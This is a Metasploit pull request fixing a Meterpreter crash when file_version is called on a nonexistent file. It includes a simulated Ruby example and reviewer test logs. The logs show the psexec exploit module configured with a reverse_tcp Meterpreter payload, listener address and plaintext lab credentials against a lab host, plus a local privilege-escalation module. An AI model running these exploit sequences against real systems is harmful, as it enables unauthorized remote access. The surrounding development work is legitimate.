
Fixes crash in meterp when file_version asks for a file that doesn't exist #17352

Merged: 1 commit, Dec 9, 2022

Conversation

smashery (Contributor) commented Dec 9, 2022

This PR fixes a crash in the file_version method for Windows meterpreter.

If the file in question doesn't exist, the program crashes. I came across this when testing windows/local/ms15_078_atmfd_bof on various OSes (beyond what is officially supported), which fails on Server 2022, since atmfd.dll is not present. So I haven't found a specific place where it's a problem, but certainly you could envisage:

  • Bad assumptions about a file being on a certain OS (e.g. deleted, removed in a later version)
  • Race conditions (deleted after checking for existence)
msf6 exploit(multi/handler) > use windows/local/ms15_078_atmfd_bof
[*] No payload configured, defaulting to windows/x64/meterpreter/reverse_tcp
msf6 exploit(windows/local/ms15_078_atmfd_bof) > set session 1
session => 1
msf6 exploit(windows/local/ms15_078_atmfd_bof) > check
[*] 20.211.33.250 - Meterpreter session 1 closed.  Reason: Died

The root cause is that railgun's GetFileVersionInfoSizeA returns 0 (error condition). Then VirtualAlloc, which is now asked for a size of 0, returns 0 itself. Eventually VerQueryValueA tries to fill a NULL buffer, and I presume it's an access violation at that point.

The fix is just to check for the GetFileVersionInfoA error condition, and bug out early.

Verification

We can test this using the interactive ruby shell:

  • Open a meterpreter session
  • use windows/local/ms15_078_atmfd_bof
  • set session <id>
  • irb to open the interactive shell
  • file_version('asdf')
  • Should return nil (not crash the shell)
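
The call chain from the root-cause paragraph (size call returns 0, VirtualAlloc of 0 bytes returns NULL, VerQueryValueA faults on it) and the nil-returning behaviour the verification steps look for, as an added Ruby example. This is not code from the PR or from metasploit-framework's own file_version implementation. `FakeRailgun` is a constructed stand-in for `client.railgun` that models the Win32 return contracts (GetFileVersionInfoSizeA and VirtualAlloc return 0 on failure) so the block runs offline; the result-hash keys ('return', 'lplpBuffer', 'puLen'), the dotted version string, the ERROR_FILE_NOT_FOUND value and the atmfd.dll entry in the file table are assumptions made for illustration.

```ruby
# Added example (not metasploit-framework code): models the Win32 version-info
# call sequence behind a Meterpreter file_version helper and shows the early
# bail-out when GetFileVersionInfoSizeA fails. FakeRailgun is a constructed
# stand-in for client.railgun; no real target or session is involved.

MEM_COMMIT          = 0x1000
MEM_RESERVE         = 0x2000
PAGE_READWRITE      = 0x04
VS_FFI_SIGNATURE    = 0xFEEF04BD   # VS_FIXEDFILEINFO.dwSignature
FIXED_FILE_INFO_LEN = 52           # 13 DWORDs

# Build a VS_FIXEDFILEINFO blob (the struct VerQueryValueA("\\") points at).
def fixed_file_info_blob(major, minor, build, revision)
  ms = (major << 16) | minor        # dwFileVersionMS
  ls = (build << 16) | revision     # dwFileVersionLS
  [VS_FFI_SIGNATURE, 0x00010000, ms, ls, ms, ls, 0, 0, 0, 0, 0, 0, 0].pack('V13')
end

# Simulated railgun: a file table plus a fake address space. Return shapes
# follow the Win32 contracts; out-params appear as hash keys (assumed names).
class FakeRailgun
  def initialize(files)
    @files = files          # path => VS_FIXEDFILEINFO blob
    @memory = {}            # fake address => bytes
    @next_addr = 0x10000
  end

  def GetFileVersionInfoSizeA(path, _handle)
    blob = @files[path]
    # Real API: 0 on failure with GetLastError set (2 = ERROR_FILE_NOT_FOUND, assumed).
    { 'return' => blob ? blob.bytesize : 0, 'GetLastError' => blob ? 0 : 2 }
  end

  def VirtualAlloc(_addr, size, _type, _protect)
    return { 'return' => 0 } if size.zero?   # real VirtualAlloc rejects dwSize == 0
    addr = @next_addr
    @next_addr += size
    @memory[addr] = "\x00" * size
    { 'return' => addr }
  end

  def GetFileVersionInfoA(path, _handle, len, buffer)
    blob = @files[path]
    return { 'return' => false } if blob.nil? || !@memory.key?(buffer)
    @memory[buffer] = blob[0, len]
    { 'return' => true }
  end

  def VerQueryValueA(block, _sub_block, _lplp_buffer, _pu_len)
    # Touching a NULL block is the access violation that kills the session.
    raise 'access violation: VerQueryValueA dereferenced NULL' unless @memory.key?(block)
    { 'return' => true, 'lplpBuffer' => block, 'puLen' => @memory[block].bytesize }
  end

  def memread(addr, len)
    @memory.fetch(addr)[0, len]
  end
end

# Decode dwFileVersionMS/LS into "major.minor.build.revision".
def parse_fixed_file_info(blob)
  return nil if blob.nil? || blob.bytesize < FIXED_FILE_INFO_LEN
  sig, _struct_ver, ms, ls = blob.unpack('V4')
  return nil unless sig == VS_FFI_SIGNATURE
  "#{ms >> 16}.#{ms & 0xffff}.#{ls >> 16}.#{ls & 0xffff}"
end

# Pre-fix shape: the size result is trusted, so a missing file gives
# VirtualAlloc(0) -> NULL and VerQueryValueA faults on it.
def file_version_unchecked(rg, path)
  size = rg.GetFileVersionInfoSizeA(path, nil)['return']
  buf  = rg.VirtualAlloc(nil, size, MEM_COMMIT | MEM_RESERVE, PAGE_READWRITE)['return']
  rg.GetFileVersionInfoA(path, 0, size, buf)
  res  = rg.VerQueryValueA(buf, '\\', 4, 4)
  parse_fixed_file_info(rg.memread(res['lplpBuffer'], res['puLen']))
end

# Fixed shape: return nil at every failing call instead of handing a NULL
# buffer to the next API.
def file_version(rg, path)
  size = rg.GetFileVersionInfoSizeA(path, nil)['return']
  return nil if size.zero?
  buf = rg.VirtualAlloc(nil, size, MEM_COMMIT | MEM_RESERVE, PAGE_READWRITE)['return']
  return nil if buf.zero?
  return nil unless rg.GetFileVersionInfoA(path, 0, size, buf)['return']
  res = rg.VerQueryValueA(buf, '\\', 4, 4)
  return nil unless res['return']
  parse_fixed_file_info(rg.memread(res['lplpBuffer'], res['puLen']))
end

# Constructed file table: one present file, everything else missing.
SAMPLE_FILES = {
  'C:\\Windows\\System32\\atmfd.dll' => fixed_file_info_blob(5, 1, 2, 250),
}.freeze

def demo
  rg = FakeRailgun.new(SAMPLE_FILES)
  crash = begin
    file_version_unchecked(rg, 'asdf')
    nil
  rescue RuntimeError => e
    e.message
  end
  {
    present: file_version(rg, 'C:\\Windows\\System32\\atmfd.dll'),
    missing: file_version(rg, 'asdf'),
    unchecked_missing: crash,
  }
end

puts demo.inspect if $PROGRAM_NAME == __FILE__
```

Against a live session the same guards sit around the railgun version and kernel32 wrappers; the point is that each call's failure value is checked before its result is passed on, so a file that is absent on this OS build, or deleted between an existence check and the version query, yields nil rather than a dead session.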

@smashery smashery added the bug label Dec 9, 2022
@gwillcox-r7 gwillcox-r7 self-assigned this Dec 9, 2022
gwillcox-r7 (Contributor) commented Dec 9, 2022

Before
msf6 exploit(windows/smb/ms17_010_psexec) > use exploit/windows/smb/psexec
show o[*] No payload configured, defaulting to windows/meterpreter/reverse_tcp
msf6 exploit(windows/smb/psexec) > show options

Module options (exploit/windows/smb/psexec):

   Name                  Current Setting  Required  Description
   ----                  ---------------  --------  -----------
   RHOSTS                                 yes       The target host(s), see https://github.com/rapid7/metasploit
                                                    -framework/wiki/Using-Metasploit
   RPORT                 445              yes       The SMB service port (TCP)
   SERVICE_DESCRIPTION                    no        Service description to to be used on target for pretty listi
                                                    ng
   SERVICE_DISPLAY_NAME                   no        The service display name
   SERVICE_NAME                           no        The service name
   SMBDomain             .                no        The Windows domain to use for authentication
   SMBPass                                no        The password for the specified username
   SMBSHARE                               no        The share to connect to, can be an admin share (ADMIN$,C$,..
                                                    .) or a normal read/write folder share
   SMBUser                                no        The username to authenticate as


Payload options (windows/meterpreter/reverse_tcp):

   Name      Current Setting  Required  Description
   ----      ---------------  --------  -----------
   EXITFUNC  thread           yes       Exit technique (Accepted: '', seh, thread, process, none)
   LHOST     172.30.107.195   yes       The listen address (an interface may be specified)
   LPORT     4444             yes       The listen port


Exploit target:

   Id  Name
   --  ----
   0   Automatic



View the full module info with the info, or info -d command.

msf6 exploit(windows/smb/psexec) > set username normal
username => normal
msf6 exploit(windows/smb/psexec) > set password normaluser
password => normaluser
msf6 exploit(windows/smb/psexec) > show options

Module options (exploit/windows/smb/psexec):

   Name                  Current Setting  Required  Description
   ----                  ---------------  --------  -----------
   RHOSTS                                 yes       The target host(s), see https://github.com/rapid7/metasploit
                                                    -framework/wiki/Using-Metasploit
   RPORT                 445              yes       The SMB service port (TCP)
   SERVICE_DESCRIPTION                    no        Service description to to be used on target for pretty listi
                                                    ng
   SERVICE_DISPLAY_NAME                   no        The service display name
   SERVICE_NAME                           no        The service name
   SMBDomain             .                no        The Windows domain to use for authentication
   SMBPass               normaluser       no        The password for the specified username
   SMBSHARE                               no        The share to connect to, can be an admin share (ADMIN$,C$,..
                                                    .) or a normal read/write folder share
   SMBUser               normal           no        The username to authenticate as


Payload options (windows/meterpreter/reverse_tcp):

   Name      Current Setting  Required  Description
   ----      ---------------  --------  -----------
   EXITFUNC  thread           yes       Exit technique (Accepted: '', seh, thread, process, none)
   LHOST     172.30.107.195   yes       The listen address (an interface may be specified)
   LPORT     4444             yes       The listen port


Exploit target:

   Id  Name
   --  ----
   0   Automatic



View the full module info with the info, or info -d command.

msf6 exploit(windows/smb/psexec) > set SMBDOMAIN DAFOREST
SMBDOMAIN => DAFOREST
msf6 exploit(windows/smb/psexec) > run

[-] Msf::OptionValidateError The following options failed to validate: RHOSTS
msf6 exploit(windows/smb/psexec) > set RHOSTS 172.30.97.103
RHOSTS => 172.30.97.103
msf6 exploit(windows/smb/psexec) > run

[*] Started reverse TCP handler on 172.30.107.195:4444 
[*] 172.30.97.103:445 - Connecting to the server...
[*] 172.30.97.103:445 - Authenticating to 172.30.97.103:445|DAFOREST as user 'normal'...
[*] 172.30.97.103:445 - Selecting PowerShell target
[*] 172.30.97.103:445 - Executing the payload...
[-] 172.30.97.103:445 - ERROR_ACCESS_DENIED opening the Service Manager
[*] Exploit completed, but no session was created.
msf6 exploit(windows/smb/psexec) > set username Administrator
username => Administrator
msf6 exploit(windows/smb/psexec) > set password theAdmin123
password => theAdmin123
msf6 exploit(windows/smb/psexec) > show options

Module options (exploit/windows/smb/psexec):

   Name                  Current Setting  Required  Description
   ----                  ---------------  --------  -----------
   RHOSTS                172.30.97.103    yes       The target host(s), see https://github.com/rapid7/metasploit
                                                    -framework/wiki/Using-Metasploit
   RPORT                 445              yes       The SMB service port (TCP)
   SERVICE_DESCRIPTION                    no        Service description to to be used on target for pretty listi
                                                    ng
   SERVICE_DISPLAY_NAME                   no        The service display name
   SERVICE_NAME                           no        The service name
   SMBDomain             DAFOREST         no        The Windows domain to use for authentication
   SMBPass               theAdmin123      no        The password for the specified username
   SMBSHARE                               no        The share to connect to, can be an admin share (ADMIN$,C$,..
                                                    .) or a normal read/write folder share
   SMBUser               Administrator    no        The username to authenticate as


Payload options (windows/meterpreter/reverse_tcp):

   Name      Current Setting  Required  Description
   ----      ---------------  --------  -----------
   EXITFUNC  thread           yes       Exit technique (Accepted: '', seh, thread, process, none)
   LHOST     172.30.107.195   yes       The listen address (an interface may be specified)
   LPORT     4444             yes       The listen port


Exploit target:

   Id  Name
   --  ----
   0   Automatic

[*] No payload configured, defaulting to windows/x64/meterpreter/reverse_tcp
msf6 exploit(windows/local/ms15_078_atmfd_bof) > set SESSION 1
SESSION => 1                        
msf6 exploit(windows/local/ms15_078_atmfd_bof) > irb
[*] Starting IRB shell...           
[*] You are in exploit/windows/local/ms15_078_atmfd_bof
                                    
irb: warn: can't alias ls from irb_ls.
>> file_version('asdf')
[*] 172.30.97.103 - Meterpreter session 1 closed.  Reason: Died
After
msf6 > use exploit/windows/smb/psexec
[*] No payload configured, defaulting to windows/meterpreter/reverse_tcp
msf6 exploit(windows/smb/psexec) > set username Administrator
username => Administrator
msf6 exploit(windows/smb/psexec) > set password theAdmin123
password => theAdmin123
msf6 exploit(windows/smb/psexec) > set RHOSTS 172.30.97.103
RHOSTS => 172.30.97.103
msf6 exploit(windows/smb/psexec) > show options

Module options (exploit/windows/smb/psexec):

   Name                  Current Setting  Required  Description
   ----                  ---------------  --------  -----------
   RHOSTS                172.30.97.103    yes       The target host(s), see https://github.com/rapid7/metasploit
                                                    -framework/wiki/Using-Metasploit
   RPORT                 445              yes       The SMB service port (TCP)
   SERVICE_DESCRIPTION                    no        Service description to to be used on target for pretty listi
                                                    ng
   SERVICE_DISPLAY_NAME                   no        The service display name
   SERVICE_NAME                           no        The service name
   SMBDomain             .                no        The Windows domain to use for authentication
   SMBPass               theAdmin123      no        The password for the specified username
   SMBSHARE                               no        The share to connect to, can be an admin share (ADMIN$,C$,..
                                                    .) or a normal read/write folder share
   SMBUser               Administrator    no        The username to authenticate as


Payload options (windows/meterpreter/reverse_tcp):

   Name      Current Setting  Required  Description
   ----      ---------------  --------  -----------
   EXITFUNC  thread           yes       Exit technique (Accepted: '', seh, thread, process, none)
   LHOST     172.30.107.195   yes       The listen address (an interface may be specified)
   LPORT     4444             yes       The listen port


Exploit target:

   Id  Name
   --  ----
   0   Automatic



View the full module info with the info, or info -d command.
[*] No payload configured, defaulting to windows/x64/meterpreter/reverse_tcp
msf6 exploit(windows/local/ms15_078_atmfd_bof) > set SESSION 1
SESSION => 1
msf6 exploit(windows/local/ms15_078_atmfd_bof) > irb
[*] Starting IRB shell...
[*] You are in exploit/windows/local/ms15_078_atmfd_bof

irb: warn: can't alias ls from irb_ls.
>> file_version('asdf')
=> nil
>> file_version('add')
=> nil
>> 

gwillcox-r7 (Contributor) commented

LGTM, thanks for making this fix @smashery!

@gwillcox-r7 gwillcox-r7 added the rn-fix release notes fix label Dec 9, 2022
@gwillcox-r7 gwillcox-r7 merged commit b65b0a7 into rapid7:master Dec 9, 2022
gwillcox-r7 (Contributor) commented

Release notes

A bug has been fixed in the file_version method for Windows Meterpreter, which would cause the session to crash if it was run on a file that did not exist on the target system.
